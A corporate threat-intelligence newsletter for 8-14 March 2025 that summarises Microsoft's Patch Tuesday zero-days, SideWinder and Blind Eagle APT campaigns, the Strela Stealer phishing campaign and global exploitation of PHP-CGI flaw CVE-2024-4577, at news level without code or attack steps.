Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 8 - 14 March
Microsoft fixes 57 bugs, 7 of them zero-day, in Patch Tuesday
Microsoft has released its March 2025 Patch Tuesday fixing 57 security flaws, including 6 actively exploited 0-day vulnerabilities and one additional publicly exposed 0-day flaw. Among these, 23 correspond to remote code execution (RCE) vulnerabilities, 6 of them critical.
Regarding the 0-days, they correspond to CVE-2025-24983, which allows local attackers to gain SYSTEM privileges on the device; CVE-2025-24984 and CVE-2025-24991, both Windows NTFS information disclosure flaws; CVE-2025-24985, Windows Fast FAT file system driver RCE flaw; CVE-2025-24993, also an RCE flaw, albeit a Windows NTFS flaw; and CVE-2025-26633, a Microsoft Management Console security feature circumvention vulnerability.
The publicly disclosed 0-day flaw corresponds to the remote code execution vulnerability in Microsoft Access CVE-2025-26630.
SideWinder intensifies its attacks on maritime and nuclear infrastructures
The APT group SideWinder has expanded its attacks to strategic sectors such as maritime and energy infrastructures, with a growing interest in the nuclear industry in South Asia.
According to a report published by Secure List, throughout 2024 its operations have spread to new regions, including Egypt and several African countries. The detected campaign relies on phishing emails with malicious documents that exploit vulnerability CVE-2017-11882 (CVSSv3 of 7.8) to deploy the Backdoor Loader malware and the StealerBot spying implant.
SideWinder is notorious for constantly updating its arsenal to evade detection, modifying its code in a matter of hours. The most affected entities include governments, ministries, logistics and telecommunications companies.
Strela Stealer targets mail customers in Europe
Trustwave has identified a new Strela Stealer campaign, an infostealer active since 2022 that steals email credentials on systems running Mozilla Thunderbird and Microsoft Outlook. This malware has been distributed via phishing campaigns in European countries such as Spain, Germany, Italy and Ukraine.
Recently, attackers have started to resend legitimate emails with fake invoices that include a ZIP file with the malware loader. According to researchers, Strela Stealer is operated by the Hive0145 group and uses Russian hosting infrastructure to evade detection.
Its code is highly obfuscated and employs advanced techniques such as fiber manipulation and system environment analysis to make it difficult to analyze.
Critical vulnerability in PHP-CGI with global exploitation
Vulnerability CVE-2024-4577 (CVSSv3 9.8, according to PHP Group), which affects web servers running PHP and was initially exploited in attacks against Japanese organizations, now poses a global threat, researchers warned.
Cisco Talos and GreyNoise have observed attack attempts in several regions, including the U.S., Singapore, Japan, the U.K. and Spain, highlighting the need for immediate action. The flaw affects PHP-CGI configuration on web servers and has been used to steal credentials and establish persistence on systems.
Although a patch was released in mid-2024, GreyNoise identified 79 exploits to exploit the vulnerability and remotely execute code on an infected system, suggesting an expanding attack pattern.
Symantec also reported its use in August 2024 against a Taiwanese university.
Blind eagle campaign against the Colombian government
Blind Eagle, an APT group active since 2018, has targeted cyberattacks against government institutions, the judicial sector, critical infrastructure and other private organizations in Colombia.
According to research by Check Point Research, this group has used a variant of the CVE-2024-43451 vulnerability to compromise more than 1,600 victims in a single campaign in late 2024. Blind Eagle, which has been observed in attacks on other Latin American countries, employs sophisticated social engineering tactics to gain access to targeted systems.
Its recent attacks have relied on .url files that, when interacted with, trigger the download and execution of malware, including remote access Trojans such as NjRAT, AsyncRAT and Remcos.
Exploiting legitimate file sharing platforms such as Google Drive and Dropbox has allowed them to evade traditional security measures. Although Microsoft released a patch for CVE-2024-43451, Blind Eagle quickly adapted, introducing a variant of the exploit in just six days.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
